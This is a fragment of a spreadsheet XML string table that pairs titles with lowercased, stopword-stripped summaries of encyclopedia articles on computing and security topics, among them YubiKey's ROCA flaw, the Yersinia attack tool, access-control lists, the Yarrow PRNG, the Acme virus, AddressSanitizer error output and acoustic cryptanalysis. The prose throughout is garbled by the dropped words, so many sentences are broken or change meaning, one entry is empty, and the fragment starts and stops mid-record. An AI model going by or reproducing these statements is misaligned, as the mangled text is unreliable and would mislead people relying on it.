vulnerability certain yubikey nano devices october 2017, security researchers found vulnerability (known roca) implementation keypair generation cryptographic library used large number infineon security chips, used wide range security keys security token products (including yubikey). vulnerability allows attacker reconstruct private using public key. yubikey yubikey yubikey nano devices within revisions 4.2.6 4.3.4 affected vulnerability. yubico remedied issue shipping yubikey devices switching different generation function offered free replacements affected keys. replacement offer ended march 2019. cases issue bypassed generating keys outside yubikey importing onto device. password protection yubikey january 2018, yubico disclosed moderate vulnerability password protection functionality yubikey could bypassed certain conditions. issue corrected firmware version 3.5.0 yubico offered free replacement keys user claiming affected. reduced initial randomness certain fips series devices june 2019, yubico released security advisory reporting reduced randomness fips-certified devices firmware version 4.4.2 4.4.4, shortly power-up (there version 4.4.3). security keys reduced randomness leave keys easily discovered compromised expected. issue affected fips series only, certain scenarios, although fips ecdsa usage higher risk". company offered free replacements affected keys. social activism yubico provided yubikeys protesters 2019–2020 hong kong protests. company states decision based mission protect vulnerable internet users, works free speech supporters. also openpgp card references external links official website yubikey comparison table yubikey fips comparison table</t>
  </si>
  <si>
    <t>Abnormal end</t>
  </si>
  <si>
    <t>abnormal abend abnormal termination software, program crash. this usage derives error message os/360, operating systems. usually capitalized, appear "abend". some common abend codes abend (data exception) abend (division zero). abends "soft" (allowing automatic recovery) "hard" (terminating activity).errors crashes novell netware network operating system usually called abends. communities netware administrators sprung around internet, abend.org. term jocularly claimed derived german word "abend" meaning "evening". also abort exit status fatal exception error references</t>
  </si>
  <si>
    <t>AbsoluteTelnet</t>
  </si>
  <si>
    <t>absolutetelnet software terminal client windows implements telnet, sftp, tapi dialup direct port connections. commercial software, originally released 1999 still regular development brian pence celestial software. features some features absolutetelnet: emulates vt52, vt100, vt220, vt320, ansi, xterm, qnx, sco-ansi, ansibbs, wyse60 password, public-key, keyboard-interactive, smartcard gssapi authentication support support triple des, twofish, blowfish, aes, arcfour, cast128 ciphers tabbed interface multiple concurrent connections (dockable) scripting support using vbscript unicode support, including bidirectional text, surrogates, combining characters, etc... passthru printing ipv6 support. idna support localized languages (english, german, french, portuguese, chinese, russian, norwegian hungarian) pocket support x-modem, y-modem, z-modem file transfer terminal connections file transfer protocol ssh2 connections also comparison clients references further reading centrify article single sign absolutetelnet external links official absolutetelnet website mailing list</t>
  </si>
  <si>
    <t>Yersinia (computing)</t>
  </si>
  <si>
    <t>yersinia network security/hacking tool unix-like operating systems, designed take advantage weakness different network protocols. yersinia considered valuable widely used security tool. 2017 yersinia still development latest stable version number 0.8.2 available github source code repository. attacks following network protocols implemented: spanning tree protocol (stp) cisco discovery protocol (cdp) dynamic trunking protocol (dtp) dynamic host configuration protocol (dhcp) standby router protocol (hsrp) ieee 802.1q ieee 802.1x cisco inter-switch link (isl) vlan trunking protocol (vtp)yersinia rated sectools.org: network security tools similar tools mausezahn traffic generator layer scapy interactive python based packet crafting tool external links official website github source code repository</t>
  </si>
  <si>
    <t>Access control expression</t>
  </si>
  <si>
    <t>access control expression respect computer file system list boolean expressions attached file object. access control expression specifies boolean formula defines users system processes granted access objects, well operations allowed given objects. each entry typical access control expression specifies operation expression operation. instance, file object access control expression contains (read=(g:system u:alice), write=(g:system !u:bob))), would give member system group user named alice permission read file would allow members system group write file, except user named bob. conventional access control lists viewed subset access control expressions combining operation allowed implementations systems implement access control expressions. mapr file system system. move toward filesystem access control expressions early unix unix-like systems pioneered flexible permission schemes based user group membership. initially, users could belong single group, constraint relaxed allow membership multiple groups. with unlimited number groups, arbitrarily complex permission schemes could implemented, cost exponentially many groups. order allow expressivity specification filesystem permissions, number competing access control list implementations developed microsoft windows unix unix-like systems linux. access control lists substantial improvement simple user group permissions, still could easily express common requirements (such banning single user group). access control expressions developed response needs. comparison access control lists permission expressions supported access control lists strict subset supported access control expressions, virtue fast direct implement. cost implementing access control expressions longer much concern advances hardware performance. also cacls capability-based security discretionary access control role-based access control references further reading</t>
  </si>
  <si>
    <t>Access level</t>
  </si>
  <si>
    <t>computer science computer programming, access level denotes permissions restrictions provided data type. reducing access level effective method limiting failure modes, reducing debugging time, simplifying overall system complexity. restricts variable modification methods defined within interface class. thus, incorporated many fundamental software design patterns. general, given object cannot created, read, updated deleted function without sufficient access level. common access levels public private, denote, respectively; permission across entire program scope, permission within corresponding class. third, protected, extends permissions subclasses corresponding class. access levels modifiers commonly used java well provides internal level. c++, difference struct class default access level, private classes public structs.to illustrate benefit: consider public variable accessed part program. error occurs, culprit could within portion program, including various sub-dependencies. large code base, leads thousands potential sources. alternatively, consider private variable. access restrictions, modifications value must occur functions defined within class. therefore, error structurally contained within class. there often single source file class, means debugging requires evaluation single file. with sufficient modularity minimal access level, large code bases avoid many challenges associated complexity. example: bank balance class retrieved java coffee break public class bank_balance public string owner; private balance; public bank_balance( string name, dollars owner name; (dollars balance dollars; else dollars public getbalance() return balance; public void setbalance(int dollars) (dollars balance dollars; else dollars here, imperative variable balance defined private int. this ensures classes, methods functions cannot accidentally overwrite variable balance. instead, must access interface class bank_balance, whose methods ensure balance cannot drop references</t>
  </si>
  <si>
    <t>Yarrow algorithm</t>
  </si>
  <si>
    <t>yarrow algorithm family cryptographic pseudorandom number generators (cprng) devised john kelsey, bruce schneier, niels ferguson published 1999. yarrow algorithm explicitly unpatented, royalty-free, open source; license required improved design ferguson schneier, fortuna, described book, practical cryptography yarrow used freebsd, superseded fortuna. yarrow also incorporated macos /dev/random devices, apple switched fortuna since 2020 name name yarrow alludes yarrow plant random generating process ching divination. since dynasty 2070 1600 bce), chinese used yarrow stalks divination. fortunetellers divide yarrow stalks piles modular arithmetic recursively generate bits random information non-uniform distribution. principles yarrow's main design principles are: resistance attacks, easy programmers cryptography background, reusability existing building blocks. former widely used designs ansi x9.17 rsaref prng loopholes provide attack opportunities circumstances. some designed real-world attacks mind. yarrow also aims provide easy integration, enable system designers little knowledge prng functionality. design components design yarrow consists four major components: entropy accumulator, reseed mechanism, generation mechanism, reseed control. yarrow accumulates entropy pools: fast pool, provides frequent reseeds keep duration compromises short possible; slow pool, provides rare conservative reseeds key. this makes sure reseed secured even entropy estimates optimistic. reseed mechanism connects entropy accumulator generating mechanism. reseeding fast pool uses current hash inputs fast pool since startup generate key; reseeding slow pool behaves similarly, except also uses hash inputs slow pool generate key. both reseedings reset entropy estimation fast pool zero, last also sets estimation slow pool zero. reseeding mechanism updates constantly, even pool information known attacker reseed, unknown attacker reseed. reseed control component leveraging frequent reseeding, desirable might allow iterative guessing attacks, infrequent reseeding, compromises information attacker key. yarrow uses fast pool reseed whenever source passes threshold values, uses slow pool reseed whenever least sources pass threshold value. specific threshold values mentioned yarrow-160 section. design philosophy yarrow assumes enough entropy accumulated ensure prng unpredictable state. designers accumulate entropy purpose keeping ability recover prng even compromised. similar design philosophy taken rsaref, ansi x9.17 prngs. yarrow-160 yarrow uses important algorithms: one-way hash function block cipher. specific description properties listed table below. generation yarrow-160 uses three-key triple counter mode generate outputs. n-bit counter value; key. order generate next output block, yarrow follows functions shown here. yarrow keeps count output block, compromised, leak output compromised stopped immediately. once system security parameter reached, algorithm generate bits prng output key. yarrow-160, system security parameter means parameter intentionally minimize number outputs backtracked. reseed reseed mechanism yarrow-160 uses sha-1 triple hash function block cipher. details steps original paper. implementation yarrow-160 yarrow-160 implemented java, freebsd. examples found implementation yarrow prng freebsd" mark murray. pros cons yarrow pros yarrow reuses existing building blocks. compared previous prngs, yarrow reasonably efficient. yarrow used programmers cryptography background reasonably secure way. yarrow portable precisely defined. interface simple clear. these features somewhat decrease chances implementation errors. yarrow created using attack-oriented design process. entropy estimation yarrow conservative, thus preventing exhaustive search attacks. common prngs fail real-world applications entropy overestimation guessable starting points. reseeding process yarrow relatively computationally expensive, thus cost attempting guess prng's higher. yarrow uses functions simplify management seed files, thus files constantly updated. handle cryptanalytic attacks, yarrow designed based block cipher secured. level security generation mechanism depends block cipher. yarrow tries avoid data-dependent execution paths. this done prevent side-channel attacks timing attacks power analysis. this improvement compared earlier prngs, example rsaref prng, completely fall apart additional information internal operations longer secured. yarrow uses cryptographic hash functions process input samples, uses secure update function combine samples existing key. this makes sure attacker cannot easily manipulate input samples. prngs rsaref prng ability resist kind chosen-input attack. unlike ansi x9.17 prng, yarrow ability recover compromise. this means even compromised, attacker able predict future outputs forever. this reseeding mechanism yarrow. yarrow entropy samples pool separated key, reseeds entropy pool content completely unpredictable. this design prevents iterative guessing attacks, attacker guesses next sample checks result observing next output. cons since outputs yarrow cryptographically derived, systems outputs secure generation mechanism itself. that means attacker break generation mechanism easily break system depends yarrow's outputs. this problem cannot solved increasing entropy accumulation. yarrow requires entropy estimation, challenge implementations. hard sure much entropy collect using reseed prng. this problem solved fortuna (prng), improvement yarrow. fortuna pools collect entropy removed entropy estimator completely. yarrow's strength limited size key. example, yarrow-160 effective size bits. security requires bits, yarrow-160 capable job. yarrow-160 uses sha-1, widely considered deprecated first public collision. references external links yarrow algorithm page yarrow-160: notes design analysis yarrow cryptographic pseudorandom number generator, kelsey, schneier, ferguson "yarrow implementation java" "yarrow implementation freebsd" implementation yarrow prng freebsd"</t>
  </si>
  <si>
    <t>Access-control list</t>
  </si>
  <si>
    <t>computer security, access-control list (acl) list permissions associated system resource (object). specifies users system processes granted access objects, well operations allowed given objects. each entry typical specifies subject operation. instance, file object contains (alice: read,write; bob: read), would give alice permission read write file give permission read implementations many kinds operating systems implement acls historical implementation; first implementation acls filesystem multics 1965. filesystem acls filesystem data structure (usually table) containing entries specify individual user group rights specific system objects programs, processes, files. these entries known access-control entries (aces) microsoft windows openvms, unix-like operating systems linux, macos, solaris. each accessible object contains identifier acl. privileges permissions determine specific access rights, whether user read from, write execute object. implementations, control whether user, group users, alter object. first operating systems provide filesystem acls multics. primos featured acls least early 1984.in 1990s rbac models extensively tested used administer file permissions. posix posix 1003.1e/1003.2c working group made effort standardize acls, resulting known "posix.1e acl" simply "posix acl". posix.1e/posix.2c drafts withdrawn 1997 participants losing interest funding project turning powerful alternatives nfsv4 acl. december 2019, live sources draft could found internet, still found internet archive.most unix unix-like operating systems (e.g. linux since 2.5.46 november 2002, bsd, solaris) support posix.1e acls (not necessarily draft 17). acls usually stored extended attributes file systems. nfsv4 nfsv4 acls much powerful posix draft acls. unlike draft posix acls, nfsv4 acls defined actually published standard, part network file system. nfsv4 acls supported many unix unix-like operating systems. examples include aix, freebsd, beginning version 10.4 ("tiger"), solaris filesystem, support nfsv4 acls, part nfsv4 standard. there experimental implementations nfsv4 acls linux: nfsv4 acls support ext3 filesystem recent richacls, brings nfsv4 acls support ext4 filesystem. posix acls, nfsv4 acls usually stored extended attributes unix-like systems. nfsv4 acls organized nearly identically windows acls used ntfs. nfsv4.1 acls superset acls posix draft acls. samba supports saving acls smb-shared files many ways, nfsv4-encoded acls. active directory acls microsoft's active directory service implements ldap server store disseminate configuration information users computers domain. active directory extends ldap specification adding type access-control list mechanism windows uses ntfs filesystem. windows 2000 extended syntax access-control entries could grant deny access entire ldap objects, also individual attributes within objects. networking acls types proprietary computer hardware particular, routers switches), access-control list provides rules applied port numbers addresses available host layer list hosts and/or networks permitted service. although additionally possible configure access-control lists based network domain names, questionable idea individual tcp, udp, icmp headers contain domain names. consequently, device enforcing access-control list must separately resolve names numeric addresses. this presents additional attack surface attacker seeking compromise security system access-control list protecting. both individual servers routers network acls. access-control lists generally configured control inbound outbound traffic, context similar firewalls. like firewalls, acls could subject security regulations standards dss. implementations algorithms ported relational database systems. many "modern" (2000s 2010s) sql-based systems, like enterprise resource planning content management systems, used models administration modules. comparing rbac main alternative model role-based access-control (rbac) model. "minimal rbac model", rbacm, compared mechanism, aclg, groups permitted entries acl. barkley (1997) showed rbacm aclg equivalent. modern implementations, acls also manage groups inheritance hierarchy groups. "modern acls" express rbac express notably powerful (compared "old acls") ability express access-control policy terms administrators view organizations. data interchange, "high-level comparisons", data translated xacml. also cacls capability-based security c-list confused deputy problem dacl extended file attributes file-system permissions privilege (computing) role-based access control (rbac) references further reading</t>
  </si>
  <si>
    <t>Achterbahn</t>
  </si>
  <si>
    <t>cryptography, achterbahn name synchronous stream cipher algorithm submitted estream project ecrypt network. final specification cipher called achterbahn-128/80, supports lengths bits bits, respectively. achterbahn developed berndt gammel, rainer göttfert oliver kniffler. achterbahn means rollercoaster german), though literal translation term would eight-track, indicates cipher encrypt eight streams parallel. parameters cipher given following table: achterbahn-128 downward compatible produce keystream achterbahn-80 desired. keystream generator achterbahn-128/80 based design principle nonlinear combination generator, however deploys primitive nonlinear feedback shift registers (nlfsr) instead linear ones (lfsr). security there known cryptanalytic attacks achterbahn-128/80 tabulated parameters faster brute force attack. recent analysis showed attacks possible larger frame (packet) lengths used communication protocol. cipher's authors recommend maximum frame length bits. this value however imply practical limitations. performance achterbahn-128/80 stream cipher optimized hardware applications restricted resources, limited gate count power consumption. implementation achterbahn-80 design size 2188 gate equivalents (nand-ge) standard cmos technology delivers throughput megabit/s. this makes suitable rfid tags. high-speed implementation throughput gigabit/s design size 8651 nand-ge. references external links achterbahn home page m.i. mahmoud et.al.: wavelet data hiding using achterbahn-128 fpga technology, ubicc journal special issue ike'07 conference, ike'07 special issue, 1/15/2008</t>
  </si>
  <si>
    <t>Acme (computer virus)</t>
  </si>
  <si>
    <t>acme computer virus infects ms-dos files. each time infected file executed, acme infect current directory creating hidden byte long read-only file base name. ms-dos, file extension specified, files base name exist, .com .exe, .com file always executed instead .exe file.) acme variant clonewar, spawning virus. acme also perhaps descendant small single-step infector zeno, confused zeno programming language. external links computer viruses (a), probert encyclopedia clonewar virus, mcafee</t>
  </si>
  <si>
    <t>AddressSanitizer</t>
  </si>
  <si>
    <t>addresssanitizer asan) open source programming tool detects memory corruption bugs buffer overflows accesses dangling pointer (use-after-free). addresssanitizer based compiler instrumentation directly mapped shadow memory. addresssanitizer currently implemented clang (starting version 3.1), (starting version 4.8), xcode (starting version 7.0) msvc (widely available starting version 16.9). average, instrumentation increases processing time memory usage 240%. users chromium firefox developers active users addresssanitizer; tool found hundreds bugs browsers. number bugs found ffmpeg freetype. linux kernel enabled addresssanitizer x86-64 architecture linux version 4.0. kerneladdresssanitizer kerneladdresssanitizer (kasan) detects dynamic memory errors linux kernel. kernel instrumentation requires special feature compiler supplying -fsanitize=kernel-address command line option, since kernels address space normal programs. examples heap-use-after-free ./a.out ==5587==error: addresssanitizer: heap-use-after-free address 0x61400000fe44 0x47b55f 0x7ffc36b28200 0x7ffc36b281f8 read size 0x61400000fe44 thread 0x47b55e main /home/test/example_useafterfree.cc:5 0x7f15cfe71b14 __libc_start_main (/lib64/libc.so.6+0x21b14) 0x47b44c _start (/root/a.out+0x47b44c) 0x61400000fe44 located bytes inside 400-byte region [0x61400000fe40,0x61400000ffd0) freed thread here: 0x465da9 operator delete[](void*) (/root/a.out+0x465da9) 0x47b529 main /home/test/example_useafterfree.cc:4 previously allocated thread here: 0x465aa9 operator new[](unsigned long) (/root/a.out+0x465aa9) 0x47b51e main /home/test/example_useafterfree.cc:3 summary: addresssanitizer: heap-use-after-free /home/test/example_useafterfree.cc:5 main shadow bytes around buggy address: 0x0c287fff9f70: 0x0c287fff9f80: 0x0c287fff9f90: 0x0c287fff9fa0: 0x0c287fff9fb0: =&gt;0x0c287fff9fc0: fa[fd]fd 0x0c287fff9fd0: 0x0c287fff9fe0: 0x0c287fff9ff0: 0x0c287fffa000: 0x0c287fffa010: shadow byte legend (one shadow byte represents application bytes): addressable: partially addressable: heap left redzone: heap right redzone: freed heap region: stack left redzone: stack redzone: stack right redzone: stack partial redzone: stack return: stack scope: global redzone: global init order: poisoned user: asan internal: ==5587==aborting heap-buffer-overflow ==25372==error: addresssanitizer: heap-buffer-overflow address 0x61400000ffd4 0x0000004ddb59 0x7fffea6005a0 0x7fffea600598 read size 0x61400000ffd4 thread 0x46bfee main /tmp/main.cpp:4:13 0x61400000ffd4 located bytes right 400-byte region [0x61400000fe40,0x61400000ffd0) allocated thread here: 0x4536e1 operator delete[](void*) 0x46bfb9 main /tmp/main.cpp:2:16 stack-buffer-overflow ==7405==error: addresssanitizer: stack-buffer-overflow address 0x7fff64740634 0x46c103 0x7fff64740470 0x7fff64740468 read size 0x7fff64740634 thread 0x46c102 main /tmp/example_stackoutofbounds.cc:5 address 0x7fff64740634 located stack thread offset frame 0x46bfaf main /tmp/example_stackoutofbounds.cc:2 this frame object(s): [32, 432) 'stack_array' memory access offset overflows variable global-buffer-overflow ==7455==error: addresssanitizer: global-buffer-overflow address 0x000000689b54 0x46bfd8 0x7fff515e5ba0 0x7fff515e5b98 read size 0x000000689b54 thread 0x46bfd7 main /tmp/example_globaloutofbounds.cc:4 0x000000689b54 located bytes right global variable 'global_array' 'example_globaloutofbounds.cc' (0x6899c0) size limitations addresssanitizer detect uninitialized memory reads (but detected memorysanitizer), detects use-after-return bugs. also capable detecting arbitrary memory corruption bugs, arbitrary write bugs integer underflow/overflows (when integer undefined behavior used calculate memory address offsets). adjacent buffers structs classes protected overflow, part prevent breaking backwards compatibility. also intel application verifier (appverif.exe) microsoft windows references external links addresssanitizer google group mailing list) addresssanitizer project page addresssanitizer documentation (clang)</t>
  </si>
  <si>
    <t>Acoustic cryptanalysis</t>
  </si>
  <si>
    <t>acoustic cryptanalysis type side channel attack exploits sounds emitted computers devices. most modern acoustic cryptanalysis focuses sounds produced computer keyboards internal computer components, historically also applied impact printers, electromechanical deciphering machines. history victor marchetti john marks eventually negotiated declassification acoustic intercepts sounds cleartext printing encryption machines. technically method attack dates time hardware cheap enough perform task; case late 1960s mid-1970s. however, using primitive means acoustical attacks made mid-1950s. book spycatcher, former operative peter wright discusses acoustic attack egyptian hagelin cipher machines 1956. attack codenamed "engulf". known attacks 2004, dmitri asonov rakesh agrawal almaden research center announced computer keyboards keypads used telephones automated teller machines (atms) vulnerable attacks based sounds produced different keys. their attack employed neural network recognize pressed. analyzing recorded sounds, able recover text data entered. these techniques allow attacker using covert listening devices obtain passwords, passphrases, personal identification numbers (pins), information entered keyboards. 2005, group berkeley researchers performed number practical experiments demonstrating validity kind threat.also 2004, shamir eran tromer demonstrated possible conduct timing attacks performing cryptographic operations analyzing variations acoustic emissions. analyzed emissions ultrasonic noise emanating capacitors inductors computer motherboards, electromagnetic emissions human-audible humming cooling fan. shamir tromer, along collaborator daniel genkin others, went successfully implement attack laptop running version gnupg implementation), using either mobile phone located close laptop, laboratory-grade microphone located away, published experimental results december 2013.acoustic emissions occur coils capacitors small movements current surge passes them. capacitors particular change diameter slightly many layers experience electrostatic attraction/repulsion piezoelectric size change. coil capacitor emits acoustic noise will, conversely, also microphonic, high-end audio industry takes steps coils capacitors reduce microphonics (immissions) muddy hi-fi amplifier's sound. march 2015, made public inkjet printers using ultrasonic heads read back using high frequency mems microphones record unique acoustic signals nozzle using timing reconstruction known printed data, "confidential" 12-point font. thermal printers also read using similar methods less fidelity signals bursting bubbles weaker. hack also involved implanting microphone, chip storage burst transmitter long-life battery doctored cartridges substituted genuine ones sent post target, typically bank, retrieved garbage using challenge-response rfid chip. similar work reconstructing printouts made dot-matrix printers publicized 2011.a acoustic cryptanalysis technique discovered research team israel's ben-gurion university cybersecurity research center allows data extracted using computer's speakers headphones. forbes published report stating researchers found information displayed, using microphone, 96.5% accuracy.in 2016, genkin, shamir, tromer published another paper described extraction attack relied acoustic emissions laptop devices decryption process. they demonstrated success attack simple mobile phone sensitive microphone. countermeasures this kind cryptanalysis defeated generating sounds spectrum form keypresses. sounds actual keypresses randomly replayed, possible totally defeat kinds attacks. advisable least different recorded variations variations) keypress around issue fingerprinting. alternatively, white noise sufficient volume (which simpler generate playback) also mask acoustic emanations individual keypresses. also tempest acoustint references</t>
  </si>
  <si>
    <t>Xymon</t>
  </si>
  <si>
    <t>xymon, network monitoring application using free software, operates general public license; central server runs unix linux hosts. history application inspired open-source version brother, network monitoring application, maintains backward compatibility between 2002 2004 henrik storner wrote open-source software add-on called bbgen toolkit, march 2005 stand-alone version released called hobbit. versions released 2005 2008, since prior user trademark "hobbit" existed, tool finally renamed xymon. january 2012, quest software discontinued development brother. functionality xymon offers graphical monitoring, showing status various network services device, well range application operating system metrics listing number mail messages queued defined level downtime. web-based graphical display uses red/yellow/green condition icon host/test, colored background indicating current worst status across hosts tests. user click colored icon view specific details (where available) relevant graphs metric statistics. built-in reporting tools include sla-type reports (availability) historical state services (snapshots). xymon supports generation alarms sent email, also external tools send messages means (e.g. sms).networked hosts devices monitored xymon server using network probes supporting large extensible range protocols, including smtp, http/s dns. hosts supported operating system also xymon client (also free software), additionally collect operating system application monitoring metrics report xymon server. clients available unix linux formats including source tarball, debian package) xymon download site sourceforge. windows hosts brother client windows, bbwin client winpsclient written windows powershell scripting language. plugins extend monitoring types applications services, many extension scripts brother unchanged xymon. also brother mrtg nagios references external links xymon.com</t>
  </si>
  <si>
    <t>Active State Power Management</t>
  </si>
  <si>
    <t>active-state power management (aspm) power management mechanism express devices garner power savings otherwise fully active state. predominantly, achieved active-state link power management; i.e., express serial link powered traffic across normally used laptops mobile internet devices extend battery life. serial-based express devices, ieee 1394 (firewire), become less active, possible computer's power management system take opportunity reduce overall power consumption placing link low-power mode instructing devices link follow suit. this usually managed operating system's power management software bios, thus different settings configured laptop battery mode versus running battery charger. power mode often achieved reducing even stopping serial clock well possibly powering device itself. while aspm brings reduction power consumption, also result increased latency serial needs 'woken low-power mode, possibly reconfigured host-to-device link re-established. this known aspm exit latency takes valuable time annoying user obvious occurs. this acceptable mobile computing, however, battery life critical. currently, power modes specified express specification; mode. concerns setting power mode direction serial link only, usually downstream controller. shuts express link completely, including reference clock signal, dedicated signal (clkreq#) asserted, results greater power reductions though penalty greater exit latency. also energy star green computing system management mode aggressive link power management (alpm) external links "pci express specifications". pci-sig. "aspm optionality (affecting pcie base specification revision 2.1)" (pdf). pci-sig. 2009-06-19. archived original (pdf) 2016-06-27. retrieved 2016-07-16.</t>
  </si>
  <si>
    <t>Active hard-drive protection</t>
  </si>
  <si>
    <t>computer hardware, active hard-drive protection refers technology attempts avoid reduce mechanical damage hard disk drives preparing disk prior impact. this approach mainly used laptop computers frequently carried around prone impacts desktop computers. implementation usually system consists accelerometers alert system excess acceleration vibration detected. software tells hard disk unload heads prevent coming contact platter, thus potentially preventing head crash.many laptop vendors implemented technology different names. some hard-disk drives also include technology, needing cooperation system. also hard disk drive failure head crash sudden motion sensor references</t>
  </si>
  <si>
    <t>Active redundancy</t>
  </si>
  <si>
    <t>active redundancy design concept increases operational availability reduces operating cost automating critical maintenance actions. this concept related condition-based maintenance fault reporting. history initial requirement began military combat systems world approach used survivability install thick armor plate resist fire install multiple guns. this became unaffordable impractical cold aircraft missile systems became common. approach build distributed systems continue work components damaged. this depends upon crude forms artificial intelligence perform reconfiguration obeying specific rules. example approach an/uyk-43 computer. formal design philosophies involving active redundancy required critical systems corrective labor undesirable impractical correct failure normal operation. commercial aircraft required multiple redundant computing systems, hydraulic systems, propulsion systems single in-flight equipment failure cause loss life. recent outcome work internet, relies backbone routers provide ability automatically re-route communication without human intervention failures occur. satellites placed orbit around earth must include massive active redundancy ensure operation continue decade longer despite failures induced normal failure, radiation-induced failure, thermal shock. this strategy dominates space systems, aircraft, missile systems. principle maintenance requires three actions, usually involve time high priority labor costs: automatic fault detection automatic fault isolation automatic reconfigurationactive redundancy eliminates time reduces manpower requirements automating three actions. this requires amount automated artificial intelligence. stands needed equipment. amount excess capacity affects overall system reliability limiting effects failure. example, takes generators power city, "n+1" would three generators allow single failure. similarly, "n+2" would four generators, would allow generator fail second generator already failed. active redundancy improves operational availability follows. 0.99 {\displaystyle a_{o}^{n}=0.99\ time} {\displaystyle \approx failed\ hours/year} 0.9999 {\displaystyle a_{o}^{n+1}=1-\left((1-a_{o}^{n})\times (1-a_{o}^{n})\right)=0.9999\ time} {\displaystyle \approx failed\ minutes/year} 0.999999 {\displaystyle a_{o}^{n+2}=1-\left((1-a_{o}^{n})\times (1-a_{o}^{n})\times (1-a_{o}^{n})\right)=0.999999\ time} {\displaystyle \approx failed\ seconds/year} passive components active redundancy passive components requires redundant components share burden failure occurs, like cabling piping. this allows forces redistributed across bridge prevent failure vehicle ruptures cable.this allows water flow redistributed pipes limited number valves shut pumps shut down. active components active redundancy active components requires reconfiguration failure occurs. computer programming must recognize failure automatically reconfigure restore operation. modern computers provide following existing feature enabled fault reporting. automatic fault detection automatic fault isolationmechanical devices must reconfigure, transmission settings hybrid vehicles redundant propulsion systems. petroleum engine start battery power fails. electrical power systems must perform actions prevent total system failure smaller failures occur, tree falls across power line. power systems incorporate communication, switching, automatic scheduling allows actions automated. shut damaged power line isolate failure adjust generator settings prevent voltage frequency excursions benefits this known strategy achieve high availability. detriments this maintenance philosophy requires custom development extra components. also active redundancy operational availability fault reporting references</t>
  </si>
  <si>
    <t>ActiveSync</t>
  </si>
  <si>
    <t>activesync mobile data synchronization developed microsoft, originally released 1996. synchronizes data handheld devices desktop computers. windows task manager, associated process called wcescomm.exe. overview activesync allows mobile device synchronized either desktop server running compatible software product. desktops, activesync synchronizes emails, calendar, contacts tasks microsoft outlook, along internet bookmarks files. activesync support features outlook. instance, contacts grouped subfolders transferred. only contacts subfolder synchronized. case exchange server, emails, calendar, contacts tasks synchronized. activesync also provides manual transfer files mobile device, along limited backup functionality, ability install uninstall mobile device applications. supported mobile devices include pdas smartphones running windows mobile, windows blackberry older blackberry versions, palm symbian platforms. windows phone support desktop activesync synchronization.starting windows vista, activesync replaced windows mobile device center, included part operating system. release history also references external links microsoft exchange activesync microsoft activesync</t>
  </si>
  <si>
    <t>XySSL</t>
  </si>
  <si>
    <t>Adaptive Domain Environment for Operating Systems</t>
  </si>
  <si>
    <t>adeos (adaptive domain environment operating systems) nanokernel hardware abstraction layer (hal), hypervisor, operates computer hardware operating system (os) runs distinct nanokernels level layer outer kernel. instead, intended several kernels together, makes similar full virtualization technologies. free open-source software released general public license (gpl). adeos provides flexible environment sharing hardware resources among multiple operating systems, among multiple instances thereby enabling multiple prioritized domains exist simultaneously hardware. adeos successfully inserted beneath linux kernel, opening range possibilities, symmetric multiprocessing (smp) clustering, efficient virtualization, patchless kernel debugging, real-time computing (rt) systems linux. unusually among hals, adeos loaded linux loadable kernel module allow another along adeos developed context real-time application interface (rtai) modularize separate real-time kernel. prior work categories methods exist enable multiple operating systems system. first simulation-based provides virtual environment additional operating systems. second suggests nanokernel layer enable hardware sharing.in simulation category, tools xen, vmware, plex86, virtualpc simos. there also kernel-based virtual machine (kvm) similar adeos, requires specific virtualization hardware support. these methods used users desire applications foreign base provide control base user. simulation never meant used production environment. nanokernel category tools space, cache kernel exokernel. suggest building miniature hardware management facilities thereafter used build production operating systems. problem approach address issue extant operating systems user base.adeos addresses requirements categories application providing simple layer inserted unmodified running thereafter provides required primitives mechanisms allow multiple oses share hardware environment. adeos attempt impose restrictions hardware’s use, different oses, necessary adeos’ operation. instead, restriction imposed system administrator system programmer. this exposes system mismanagement, idea behind adeos give back control system administrators programmers. architecture adeos implements queue signals. each time peripheral sends signal, different operating systems running machine awakened, turn, must decide accept (handle), ignore, discard, terminate signal. signals handled discarded) passed next chain. signals terminated propagated latter stages.as adeos ensure equal trusted access hardware, takes control hardware commands issued different oses; but, also must intrude much different oses’ normal behavior. each encompassed domain total control. this domain include private address space software abstractions process, virtual memory, file-systems, etc. adeos attempt impose policy hardware except needed operation. task determining policy left system architect. adeos interrupt pipe adeos uses interrupt pipe propagate interrupts different domains running hardware. domains prefer first receive hardware interrupts, adeos provides mechanism domains access priority interrupt dispatching. effect, adeos places requesting domain's interrupt handler accompanying tables, called interrupt mechanism space terminology, first stages interrupt pipeline. domains control whether accept, ignore, discard terminate interrupts. each different effect controlled differently.accepting interrupts normal state domain's interrupt mechanism. when adeos encounters domain accepting interrupts summons interrupt handler required environment stack content interrupt handler operate correctly. decide operate number operations including task scheduling. once done, pipeline proceeds planned propagating interrupts pipeline.when domain want interrupted, reason, asks adeos stall stage domain occupies interrupt pipeline. interrupts pipeline stalled stage occupied domain. when done wanting uninterrupted, asks adeos install pipeline thereafter interrupts stalled corresponding stage follow route stages pipeline.when domain discarding interrupts, interrupt passes stage occupied domain continues onto stages. when domain terminates interrupts interrupts terminated propagated latter stages. interrupt discarding termination possible domain recognizes adeos. since oses recognize adeos, possible create domain serves handler hence, interrupt pipeline, stage always precedes handled domain's stage take actions domain adeos order provide handled domain's illusion normal system operation. once adeos done traversing pipeline checks domains dormant. case, calls idle task. this task remains active occurrence next interrupt. domains dormant restores processor state prior interrupt entering pipeline execution continues left. since adeos much hardware dependent, many details specific particular implementations. applicability general-purpose operating system resource sharing general-purpose operating system resource sharing main objectives adeos, provide environment enables multiple general purpose oses share hardware. operating system development developing oses usually complicated process sometimes requires extra hardware in-circuit emulators probe hardware running. using adeos, development eased since undesired behavior controlled appropriate domain handler. also provide default domain handler development developers controlled direct access hardware meant control. adeos kernel-module, development domain handlers developed independently adeos. patchless kernel debuggers probers adeos provides kernel debuggers probers take control linux without modifying linux. adeos domains, facilities would load normal kernel modules would thereafter request ring-zero domain adeos. once done, request priority interrupt dispatching interrupt pipeline. hence, linux gets handle interrupts, able intercept interrupts carry requested debugging tasks. this also extended performance profilers development tools. also xenomai nanokernel hardware abstraction layer (software) references external links official website adeos workspace</t>
  </si>
  <si>
    <t>Adaptive chosen-ciphertext attack</t>
  </si>
  <si>
